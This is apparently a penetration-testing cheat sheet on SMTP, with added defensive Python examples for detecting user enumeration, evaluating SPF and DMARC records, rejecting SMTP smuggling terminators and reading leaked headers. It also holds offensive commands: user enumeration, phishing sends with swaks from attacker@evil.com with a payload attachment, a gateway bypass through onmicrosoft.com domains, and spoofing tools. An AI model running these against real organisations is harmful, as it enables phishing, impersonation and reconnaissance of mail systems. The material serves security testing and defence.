The Simple Mail Transfer Protocol (SMTP) is used for sending and receiving email. It is commonly paired with POP3 or IMAP for message retrieval.
Default Ports: 25 (SMTP), 465 (SMTPS), 587 (SMTP with STARTTLS)
Basic Connections
```bash
# SMTP (plain)
nc -vn <IP> 25
# SMTPS (TLS)
openssl s_client -crlf -connect smtp.mailgun.org:465
# SMTP with STARTTLS
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
```
Enumeration
```bash
# Nmap
nmap -p25 --script smtp-commands 10.10.10.10
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720 -p 25 <IP>
# Find MX servers
dig +short mx google.com
```
NTLM Info Disclosure
If the server supports NTLM auth (Windows), send a challenge to extract version info:
```bash
telnet example.com 587
# lines prefixed with >> are what you type; everything else is the server reply
>> HELO
>> AUTH NTLM
# server answers 334 and waits for the NTLM Type 1 message
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
# The 334 response contains the NTLM challenge: IIS version, Windows version
# Automate with nmap
nmap -p25 --script smtp-ntlm-info.nse <IP>
```
Username Enumeration
```bash
# VRFY
telnet 1.1.1.1 25
HELO x
VRFY root
# 250 Super-User root@myhost = exists
VRFY blah
# 550 blah... User unknown
```
```bash
# RCPT TO
telnet 1.1.1.1 25
HELO x
MAIL FROM:example@domain.com
RCPT TO:test
# 550 = unknown, 250 = exists
```
```bash
# EXPN (expands aliases and lists)
EXPN root
# 250 2.1.5 ed.williams@myhost
EXPN sshd
# 250 2.1.5 sshd privsep sshd@myhost
```
```bash
# Automated
smtp-user-enum -M VRFY -U users.txt -t <IP>
smtp-user-enum -M EXPN -U users.txt -t <IP>
smtp-user-enum -M RCPT -U users.txt -t <IP>
msf> use auxiliary/scanner/smtp/smtp_enum
```
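From the defender's side, the VRFY/EXPN/RCPT probing above leaves a distinctive trail: a single client producing a burst of "User unknown" rejects. The following is an added example (not code from the original page) that parses Postfix-style smtpd log lines and flags clients exceeding a threshold of such rejects within a sliding window. The log lines are constructed in Postfix format for this example, not a real capture.

```python
"""Detect SMTP user-enumeration probing in mail server logs (added example).

The log lines in SAMPLE_LOG are constructed in Postfix smtpd style; the
parser keys on the "Recipient address rejected: User unknown" reject that
an RCPT TO probe of a non-existent mailbox produces.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

REJECT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: "
    r"NOQUEUE: reject: RCPT from \S*\[(?P<ip>[^\]]+)\]: 550 [\d.]+ "
    r"<(?P<rcpt>[^>]*)>: Recipient address rejected: User unknown"
)

# Constructed sample: four probes from one client in five seconds, one typo from another.
SAMPLE_LOG = """\
Jan  5 10:00:01 mx1 postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <alice@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<alice@example.com> proto=ESMTP helo=<x>
Jan  5 10:00:02 mx1 postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <bob@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<bob@example.com> proto=ESMTP helo=<x>
Jan  5 10:00:03 mx1 postfix/smtpd[2311]: 1A2B3C: client=unknown[198.51.100.7]
Jan  5 10:00:04 mx1 postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <carol@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<carol@example.com> proto=ESMTP helo=<x>
Jan  5 10:00:05 mx1 postfix/smtpd[2311]: NOQUEUE: reject: RCPT from unknown[198.51.100.7]: 550 5.1.1 <dave@example.com>: Recipient address rejected: User unknown in local recipient table; from=<probe@example.net> to=<dave@example.com> proto=ESMTP helo=<x>
Jan  5 10:07:30 mx1 postfix/smtpd[2402]: NOQUEUE: reject: RCPT from mail.example.org[203.0.113.9]: 550 5.1.1 <typo@example.com>: Recipient address rejected: User unknown in local recipient table; from=<user@example.org> to=<typo@example.com> proto=ESMTP helo=<mail.example.org>
"""


def parse_rejects(log_text):
    """Yield (timestamp, client_ip, recipient) for each user-unknown reject."""
    for line in log_text.splitlines():
        m = REJECT_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year and may pad the day with two spaces
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        yield ts, m["ip"], m["rcpt"]


def find_probers(log_text, threshold=3, window_seconds=60):
    """Return {client_ip: total_rejects} for clients that produced at least
    `threshold` user-unknown rejects inside any `window_seconds` window."""
    per_ip = defaultdict(list)
    for ts, ip, _ in parse_rejects(log_text):
        per_ip[ip].append(ts)
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1            # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


if __name__ == "__main__":
    print(find_probers(SAMPLE_LOG))   # {'198.51.100.7': 4}
```

The one legitimate typo from 203.0.113.9 stays below the threshold. On the server side, Postfix can refuse the VRFY probe outright with `disable_vrfy_command = yes`, which still leaves RCPT TO probing to be caught by this kind of rate-based detection.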
Sending Emails
```bash
# sendEmail
sendEmail -t to@domain.com -f from@attacker.com -s <smtp_ip> \
  -u "Important subject" -a /tmp/payload.pdf
# swaks
swaks --to victim@target.com \
  --from attacker@evil.com \
  --header "Subject: Test" \
  --body "Click http://attacker/" \
  --server <SMTP_IP>
# With attachment (use @ prefix to embed file bytes)
swaks --to hr@example.local --from attacker@evil.com \
  --header "Subject: Resume" \
  --body "Please review" \
  --attach @resume.doc \
  --server 10.0.0.5
```
Email Security Mechanisms
SPF (Sender Policy Framework)
```bash
# Check SPF record
dig txt google.com | grep spf
# Online validator
# https://www.kitterman.com/spf/validate.html
```
SPF Qualifiers:
- `+` = PASS (default)
- `?` = NEUTRAL
- `~` = SOFTFAIL (accept but mark)
- `-` = FAIL (reject)
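To see how those qualifiers are applied, here is an added example (not code from the original page) of a small SPF parser and evaluator. It takes the record text as input, so it does no DNS lookups: ip4, ip6 and all are evaluated, while include, a, mx, exists and ptr are skipped because a full check_host() per RFC 7208 would have to resolve them. The records in the usage are constructed.

```python
"""SPF record parser and evaluator (added example, no DNS resolution)."""
import ipaddress

# Qualifier -> result (RFC 7208 section 4.6.2); "+" is the default when absent.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record):
    """Split a 'v=spf1 ...' string into (qualifier, mechanism, argument) tuples.
    Modifiers such as redirect= and exp= come back with mechanism 'modifier'."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF version 1 record")
    parsed = []
    for term in terms[1:]:
        # a modifier has '=' before any ':' (ip6 arguments contain ':' but no '=')
        if "=" in term.split(":", 1)[0]:
            parsed.append(("", "modifier", term))
            continue
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        parsed.append((qualifier, name.lower(), arg))
    return parsed


def check_ip(record, sender_ip):
    """Return pass/fail/softfail/neutral for sender_ip against the record.
    A record that matches nothing yields 'neutral' (RFC 7208 section 4.7)."""
    addr = ipaddress.ip_address(sender_ip)
    for qualifier, mech, arg in parse_spf(record):
        if mech == "all":
            return QUALIFIERS[qualifier]
        if mech in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            if net.version == addr.version and addr in net:
                return QUALIFIERS[qualifier]
        # include/a/mx/exists/ptr and modifiers need DNS and are skipped here
    return "neutral"


def permissiveness(record):
    """Describe what the record does with senders it does not list."""
    alls = [q for q, m, _ in parse_spf(record) if m == "all"]
    if not alls:
        return "no all mechanism (unlisted senders are neutral)"
    return {"+": "WEAK: +all passes every sender",
            "?": "WEAK: ?all is neutral for every sender",
            "~": "softfail for unlisted senders",
            "-": "fail for unlisted senders"}[alls[0]]


if __name__ == "__main__":
    # constructed record and addresses
    record = "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 include:_spf.example.net ~all"
    print(check_ip(record, "192.0.2.77"))      # pass
    print(check_ip(record, "198.51.100.9"))    # softfail
    print(permissiveness("v=spf1 +all"))       # WEAK: +all passes every sender
```

The `permissiveness` check is the one worth running over your own domains: `+all` or `?all` makes the record useless against spoofing, and a missing `all` silently falls back to neutral.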
DKIM (DomainKeys Identified Mail)
```bash
# Get DKIM public key (need selector from email headers)
dig 20120113._domainkey.gmail.com TXT | grep p=
```
DMARC
```bash
# Get DMARC record
dig _dmarc.facebook.com txt | grep DMARC
# p=reject: strict rejection
# p=quarantine: mark as spam
# p=none: monitoring only
```
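The three policies above interact with the `sp=` and `pct=` tags, which is where "we have DMARC" often turns out to mean "we monitor". The following is an added example (not code from the original page) that parses a DMARC record, fills in the RFC 7489 defaults, and reports what a receiver does with a message that failed DMARC. The records in the test are constructed; `sample_bucket` stands in for the receiver's random pct sampling.

```python
"""DMARC record parser and failing-message disposition (added example).
Input is the TXT value fetched from _dmarc.<domain>."""

DISPOSITION = {"reject": "reject", "quarantine": "quarantine",
               "none": "deliver (monitor only)"}
# Outside the pct sample the next less strict policy applies (RFC 7489 6.6.4)
NEXT_LESS_STRICT = {"reject": "quarantine", "quarantine": "none", "none": "none"}


def parse_dmarc(record):
    """Return the tag dict with RFC 7489 defaults filled in."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, sep, value = part.partition("=")
        if not sep:
            raise ValueError(f"malformed tag: {part!r}")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    if tags.get("p") not in DISPOSITION:
        raise ValueError("p= tag missing or invalid")
    tags.setdefault("sp", tags["p"])      # subdomain policy defaults to p
    tags.setdefault("pct", "100")         # apply the policy to all failing mail
    tags.setdefault("adkim", "r")         # relaxed DKIM alignment by default
    tags.setdefault("aspf", "r")          # relaxed SPF alignment by default
    return tags


def disposition(tags, is_subdomain=False, sample_bucket=0):
    """What a receiver does with a message that FAILED DMARC.
    sample_bucket is 0-99 and models the receiver's random pct sampling."""
    policy = tags["sp"] if is_subdomain else tags["p"]
    if sample_bucket >= int(tags["pct"]):
        policy = NEXT_LESS_STRICT[policy]
    return DISPOSITION[policy]


def is_enforcing(tags):
    """True only if spoofed mail for the organisational domain is actually blocked."""
    return tags["p"] in ("reject", "quarantine") and int(tags["pct"]) == 100


if __name__ == "__main__":
    t = parse_dmarc("v=DMARC1; p=reject; sp=quarantine; pct=50; rua=mailto:dmarc@example.com")
    print(disposition(t, sample_bucket=75))                      # quarantine
    print(disposition(t, is_subdomain=True, sample_bucket=75))  # deliver (monitor only)
    print(is_enforcing(t))                                        # False
```

The `pct=50` record is the interesting case: half of the failing mail to the organisational domain is only quarantined, and failing mail to subdomains outside the sample is delivered.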
Avoiding Email Security Gateways (SEGs)
Organizations using Entra ID / Exchange Online often have multiple accepted domains. If any accepted domain has an MX record pointing directly to Exchange Online instead of the SEG, mail sent to that domain reaches the mailbox without passing through the gateway. The default <tenant>.onmicrosoft.com domain always has its MX pointing to Exchange Online.
```bash
# Enumerate accepted domains
dnsx -d target.com -mx
# Send to tenant.onmicrosoft.com to bypass SEG
# swaks --to user@tenant.onmicrosoft.com ...
```
SMTP Spoofing
```bash
# Check for spoofing vulnerabilities
python3 -m serain.mailspoof target.com
python3 checkdmarc.py target.com
# Automated spoofing
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com \
  --subject TEST --sender administrator@victim.com
```
Open Relay Testing
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
Open relay configuration (misconfiguration to look for in Postfix `main.cf`):
```
mynetworks = 0.0.0.0/0 # Accepts connections from any IP
```
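As an added example (not from the original page), the weak setting beside a corrected Postfix `main.cf` fragment. The `10.0.0.0/8` range is a placeholder for your own trusted networks; the relay restriction line uses the standard Postfix `smtpd_relay_restrictions` parameter.

```ini
# Weak: every client on the internet is "trusted" and may relay through this server
mynetworks = 0.0.0.0/0

# Corrected: only loopback and the internal LAN (placeholder range) are trusted,
# and relaying is limited to those clients or authenticated users
mynetworks = 127.0.0.0/8 [::1]/128 10.0.0.0/8
smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
```

After changing the setting, re-run the `smtp-open-relay` script above from an address outside `mynetworks`; the server should answer the relay attempt with a 554 "Relay access denied".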
SMTP Smuggling
SMTP smuggling bypasses SPF, DKIM and DMARC by exploiting differences in how SMTP servers recognise the end of the DATA section. The standard terminator is <CR><LF>.<CR><LF>, but some servers also accept <LF>.<LF>. An outbound server that does not treat <LF>.<LF> as end-of-data forwards it inside the message body, while a receiving server that does accept it ends the message there and treats whatever follows as a second, injected message whose envelope it never authenticated.
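The defence is on the receiving side: terminate DATA only on the RFC 5321 sequence and treat lenient terminators inside the body as a signal. The following is an added example (not code from the original page) of that strict split plus a scan for the non-standard sequences a lenient server would have honoured; the sample streams are constructed.

```python
"""Strict end-of-data handling for the SMTP DATA phase (added example).

split_data() ends the message only at <CRLF>.<CRLF>; find_lenient_terminators()
reports where a server that also accepts bare <LF>.<LF> (or <CR>.<CR>) would
have cut the stream instead, so such messages can be rejected or logged.
"""
STRICT_EOD = b"\r\n.\r\n"
# Sequences some implementations have accepted as end-of-data but which are not valid.
LENIENT_EOD = (b"\n.\n", b"\r.\r", b"\n.\r\n")


def split_data(stream):
    """Return (message, remaining) splitting only on <CRLF>.<CRLF>."""
    idx = stream.find(STRICT_EOD)
    if idx == -1:
        raise ValueError("DATA not terminated")
    # keep the CRLF that ends the last body line, drop the terminator itself
    return stream[:idx + 2], stream[idx + len(STRICT_EOD):]


def find_lenient_terminators(message):
    """Byte offsets inside the body where a lenient receiver would end DATA.
    Dot-stuffed lines ('..') never match because they do not form '\\n.\\n'."""
    offsets = set()
    for pattern in LENIENT_EOD:
        start = 0
        while (pos := message.find(pattern, start)) != -1:
            offsets.add(pos)
            start = pos + 1
    return sorted(offsets)


def inspect_data(stream):
    """Split strictly and flag bodies that a lenient server would cut elsewhere."""
    message, remaining = split_data(stream)
    suspicious = find_lenient_terminators(message)
    return {"message": message, "remaining": remaining,
            "suspicious_offsets": suspicious, "clean": not suspicious}


# Constructed samples: a body containing a bare-LF "dot line", and a clean body
# with a properly dot-stuffed line.
SAMPLE = (b"From: a@example.com\r\nTo: b@example.com\r\n\r\nhello\r\n"
          b"\n.\n"
          b"text a lenient server would treat as a new message\r\n"
          b".\r\n")
CLEAN = b"From: a@example.com\r\n\r\nhello\r\n..dot-stuffed line\r\n.\r\n"

if __name__ == "__main__":
    print(inspect_data(SAMPLE)["suspicious_offsets"])  # [49]
    print(inspect_data(CLEAN)["clean"])                # True
```

A strict receiver keeps the whole stream as one message (nothing remains after the terminator), and the offset list tells you exactly where a lenient peer in the path would have started a second message.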
Config Files
```
/etc/postfix/master.cf
/etc/postfix/main.cf
sendmail.cf
submit.cf
```
If you can make the victim send you an email (e.g., contact form), inspect the headers:
- Internal server names and IP addresses
- Antivirus software info (X-Virus-Scanned header)
- Internal relay hops
NDN (Non-Delivery Notification) Harvesting
Send emails to non-existent addresses. The bounce-back NDN often contains:
- Internal server names
- IP addresses of mail infrastructure
- AV software information
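Both the contact-form reply and the NDN are read the same way: walk the Received chain and the X-* headers. The following is an added example (not code from the original page) that pulls relay hostnames, private IPs and the antivirus and mailer headers out of a raw message; the headers are constructed, and the hostnames and addresses in them are placeholders.

```python
"""Extract infrastructure details from the headers of a received e-mail or
bounce (added example). The sample headers are constructed."""
import ipaddress
import re
from email import message_from_string

SAMPLE_HEADERS = """\
Received: from mail-gw.corp.example.internal (mail-gw.corp.example.internal [10.20.30.5])
    by mx.example.com (Postfix) with ESMTP id 4Xk2M1;
    Mon, 1 Jan 2024 10:00:00 +0000
Received: from [192.168.10.44] (unknown [192.168.10.44])
    by mail-gw.corp.example.internal (Postfix) with ESMTPA;
    Mon, 1 Jan 2024 09:59:58 +0000
X-Virus-Scanned: Debian amavisd-new at corp.example.internal
X-Mailer: Microsoft Outlook 16.0
From: helpdesk@example.com
To: researcher@example.org
Subject: Re: your contact form message

(body)
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
# hostnames that follow "from" or "by" in a Received header
HOST_RE = re.compile(r"\b(?:from|by)\s+([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)", re.IGNORECASE)


def dedupe(items):
    """Drop duplicates while keeping first-seen order."""
    seen = []
    for item in items:
        if item not in seen:
            seen.append(item)
    return seen


def parse_hops(received_values):
    """One dict of hostnames and bracketed IPs per Received header."""
    return [{"hosts": dedupe(HOST_RE.findall(value)),
             "ips": dedupe(IP_RE.findall(value))} for value in received_values]


def summarize(raw_message):
    """Return what the headers reveal about the sender's mail infrastructure."""
    msg = message_from_string(raw_message)          # unfolds multi-line headers
    hops = parse_hops(msg.get_all("Received", []))
    ips = dedupe(ip for hop in hops for ip in hop["ips"])
    return {
        "hops": hops,
        "hosts": dedupe(host for hop in hops for host in hop["hosts"]),
        "internal_ips": [ip for ip in ips if ipaddress.ip_address(ip).is_private],
        "antivirus": msg.get("X-Virus-Scanned"),
        "mailer": msg.get("X-Mailer"),
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_HEADERS)
    print(summary["hosts"])         # ['mail-gw.corp.example.internal', 'mx.example.com']
    print(summary["internal_ips"])  # ['10.20.30.5', '192.168.10.44']
    print(summary["antivirus"])     # Debian amavisd-new at corp.example.internal
```

Run it over a message your own gateway sends out (or a bounce it generates) to see which internal names, private addresses and scanning products leave the organisation with every reply.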